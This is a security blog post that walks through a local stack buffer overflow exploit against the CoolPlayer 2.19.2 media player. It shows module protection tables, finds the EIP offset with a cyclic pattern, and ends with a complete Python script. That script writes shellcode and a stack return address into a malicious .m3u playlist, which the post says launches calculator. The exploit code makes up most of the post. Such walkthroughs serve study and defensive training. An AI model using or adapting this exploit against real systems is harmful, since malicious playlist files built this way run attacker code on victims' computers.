ii4gsp

CoolPlayer 2.19.2 Exploit (Local) 본문

시스템 해킹/Windows Pwnable

CoolPlayer 2.19.2 Exploit (Local)

ii4gsp 2020. 12. 30. 18:20 
Test Environment: Windows 10 x64
Test Program: CoolPlayer 2.19.2
Language used: Python 2.7
Debugger: Immunity Debugger
Module used: mona.py

 

 

----------------------------------------------------------------------------------------------------------------------------------
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
 ----------------------------------------------------------------------------------------------------------------------------------
 0x74dd0000 | 0x74df8000 | 0x00028000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [WINMM.dll] (C:\WINDOWS\SYSTEM32\WINMM.dll)
 0x761f0000 | 0x7626b000 | 0x0007b000 | True   | True    | True  |  False   | True   | 10.0.19041.546 [msvcp_win.dll] (C:\WINDOWS\System32\msvcp_win.dll)
 0x759b0000 | 0x75a8b000 | 0x000db000 | True   | True    | True  |  False   | True   | 10.0.19041.685 [gdi32full.dll] (C:\WINDOWS\System32\gdi32full.dll)
 0x752b0000 | 0x7536f000 | 0x000bf000 | True   | True    | True  |  False   | True   | 7.0.19041.546 [msvcrt.dll] (C:\WINDOWS\System32\msvcrt.dll)
 0x76630000 | 0x766f0000 | 0x000c0000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [RPCRT4.dll] (C:\WINDOWS\System32\RPCRT4.dll)
 0x773f0000 | 0x77593000 | 0x001a3000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [ntdll.dll] (C:\WINDOWS\SYSTEM32\ntdll.dll)
 0x76350000 | 0x763c6000 | 0x00076000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [sechost.dll] (C:\WINDOWS\System32\sechost.dll)
 0x00400000 | 0x00485000 | 0x00085000 | False  | False   | False |  False   | False  | -1.0- [coolplayer+.exe] (C:\Users\ii4gsp\CoolPlayer+Portable\App\CoolPlayer+\coolplayer+.exe)
 0x74e00000 | 0x75258000 | 0x00458000 | True   | True    | True  |  False   | True   | 11.00.19041.320 [WININET.dll] (C:\WINDOWS\SYSTEM32\WININET.dll)
 0x763d0000 | 0x764c0000 | 0x000f0000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [KERNEL32.DLL] (C:\WINDOWS\System32\KERNEL32.DLL)
 0x75f30000 | 0x75f55000 | 0x00025000 | True   | True    | True  |  False   | True   | 10.0.19041.546 [IMM32.DLL] (C:\WINDOWS\System32\IMM32.DLL)
 0x75370000 | 0x75453000 | 0x000e3000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [ole32.dll] (C:\WINDOWS\System32\ole32.dll)
 0x75b90000 | 0x75bd5000 | 0x00045000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [SHLWAPI.dll] (C:\WINDOWS\System32\SHLWAPI.dll)
 0x75f60000 | 0x760f6000 | 0x00196000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [USER32.dll] (C:\WINDOWS\System32\USER32.dll)
 0x764c0000 | 0x7656f000 | 0x000af000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [comdlg32.dll] (C:\WINDOWS\System32\comdlg32.dll)
 0x768c0000 | 0x76b41000 | 0x00281000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [combase.dll] (C:\WINDOWS\System32\combase.dll)
 0x765b0000 | 0x765c8000 | 0x00018000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [win32u.dll] (C:\WINDOWS\System32\win32u.dll)
 0x76b80000 | 0x77133000 | 0x005b3000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [SHELL32.dll] (C:\WINDOWS\System32\SHELL32.dll)
 0x6c530000 | 0x6c5af000 | 0x0007f000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [DSOUND.dll] (C:\WINDOWS\SYSTEM32\DSOUND.dll)
 0x76750000 | 0x767d8000 | 0x00088000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [shcore.dll] (C:\WINDOWS\System32\shcore.dll)
 0x705e0000 | 0x707f2000 | 0x00212000 | True   | True    | True  |  False   | True   | 6.10 [COMCTL32.dll] (C:\WINDOWS\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.488_none_11b1e5df2ffd8627\COMCTL32.dll)
 0x75be0000 | 0x75df4000 | 0x00214000 | True   | True    | True  |  False   | True   | 10.0.19041.662 [KERNELBASE.dll] (C:\WINDOWS\System32\KERNELBASE.dll)
 0x75e10000 | 0x75f30000 | 0x00120000 | True   | True    | True  |  False   | True   | 10.0.19041.546 [ucrtbase.dll] (C:\WINDOWS\System32\ucrtbase.dll)
 0x76100000 | 0x76123000 | 0x00023000 | True   | True    | True  |  False   | True   | 10.0.19041.685 [GDI32.dll] (C:\WINDOWS\System32\GDI32.dll)
 0x73490000 | 0x734d4000 | 0x00044000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [powrprof.dll] (C:\WINDOWS\SYSTEM32\powrprof.dll)
 0x77300000 | 0x7737a000 | 0x0007a000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [ADVAPI32.dll] (C:\WINDOWS\System32\ADVAPI32.dll)
 0x70b10000 | 0x70b2d000 | 0x0001d000 | True   | True    | True  |  False   | True   | 10.0.19041.320 [winmmbase.dll] (C:\WINDOWS\SYSTEM32\winmmbase.dll)

Only modules have protection techniques.

 

 

Use the !mona pc 1000 command to generate a string with a specific pattern.

 

 

import struct

buf = (
    'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9A' +
    'd0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag' +
    '1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3' +
    'Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5' +
    'Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4' +
    'Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5A' +
    's6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7A' +
    'v8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay' +
    '8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9B' +
    'c0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2' +
    'Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
)

f = open('test.m3u', 'w')
f.write(buf)
f.close()

Creates a file using the generated string.

 

 

When you insert the generated file, the EIP is manipulated to 0x69413169.

That is, an overflow has occurred.

 

 

If you track the offset of the EIP, you can see that it's 244.

 

 

import struct

buf = ''
buf += 'A' * 244
buf += 'B' * 4

f = open('test.m3u', 'w')
f.write(buf)
f.close()

To control the EIP, it is necessary to verify that the EIP changes to the manipulated value.

 

 

EIP is manipulated to 0x42424242. This means that it is well covered by the manipulated values.

Binary file has no protection technique, so you can enter stack address as ret.

 

 

I will enter the 0x001926D8 in ret.

 

 

import struct

shellcode = (
  "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
  "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
  "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
  "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
  "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
  "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
  "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
  "\x1c\x39\xbd"
)

payload = ''
payload += 'A' * (244 - len(shellcode))
payload += shellcode
payload += struct.pack('<L', 0x001926D8)

f = open('exploit.m3u', 'w')
f.write(payload)
f.close()

This is the completed exploit code.

 

 

The exploit was successful and the calculator was executed.

Successful exploitation could allow the calculator to run.

'시스템 해킹 > Windows Pwnable' 카테고리의 다른 글

[1-day Analysis] CVE-2018-9059 - Easy File Sharing Web Server 7.2 Exploit (RCE)  (0) 2021.01.25
VUPlayer 2.49 Exploit (Local)  (0) 2021.01.04
Easy Chat Server 3.1 Exploit (RCE)  (0) 2020.12.30
부분 Overwrite  (0) 2020.04.22
Integer Overflow Exploit  (0) 2020.04.20
'시스템 해킹/Windows Pwnable' Related Articles more
Comments